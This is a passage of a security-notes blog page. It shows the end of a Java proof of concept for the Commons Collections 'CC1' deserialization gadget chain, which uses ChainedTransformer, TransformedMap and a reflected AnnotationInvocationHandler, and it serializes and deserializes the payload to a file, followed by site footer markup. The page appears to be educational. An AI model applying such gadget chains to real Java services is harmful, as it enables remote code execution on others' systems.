class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line">        HashMap&lt;Object, Object&gt; objectObjectHashMap = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;Object,Object&gt;();</span><br><span class="line">        objectObjectHashMap.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;b&quot;</span>);</span><br><span class="line">        Map&lt;Object,Object&gt; TransformedMapDecorate = TransformedMap.decorate(objectObjectHashMap, <span class="literal">null</span>,chainedTransformer);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">AnnotationInvocationHandler</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);<span class="comment">//获取类名</span></span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">AnnotationInvocationHandlerConstructor</span> <span class="operator">=</span> AnnotationInvocationHandler.getDeclaredConstructor(Class.class, Map.class);<span class="comment">//获取构造器</span></span><br><span class="line">        AnnotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);<span class="comment">//设置可以访问</span></span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> AnnotationInvocationHandlerConstructor.newInstance(Target.class, TransformedMapDecorate);<span class="comment">//实例化</span></span><br><span class="line">        <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).writeObject(o);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
        <!-- Tags and categories -->
        
        <div class="row justify-content-between article-taxonomy">
            <div class="col-lg-4 col-lg-offset-2 col-md-5 col-md-offset-1">
                
                    


<a href="/tags/java安全/" class="text-decoration-none text-secondary">#java安全</a>


                
            </div>
            <div class="col-lg-4 col-md-5 text-end">
                
            </div>
        </div>
        

    </div>
</article>



        <footer class="site-footer">
      <div class="container">
        <div class="site-footer-inner">
          <div class="footer-copy">Copyright 2024 evabd21 | Security notes with a cleaner presentation.</div>
          <div class="footer-links">
            <a href="/getting-start">About</a>
            <a href="/archives">Archives</a>
            <a target="_blank" rel="noopener" href="https://github.com/BP-Devteam/hexo-theme-bp-gallery">Github</a>
          </div>
        </div>
      </div>
    </footer>
  </div>


    <!-- After footer scripts -->
    <!-- Disqus Comments -->



   

<!-- hexo injector body_end start --><script src="https://cdn.jsdelivr.net/npm/bs5-lightbox@1.8.3/dist/index.bundle.min.js"></script><!-- hexo injector body_end end --></body>

</html>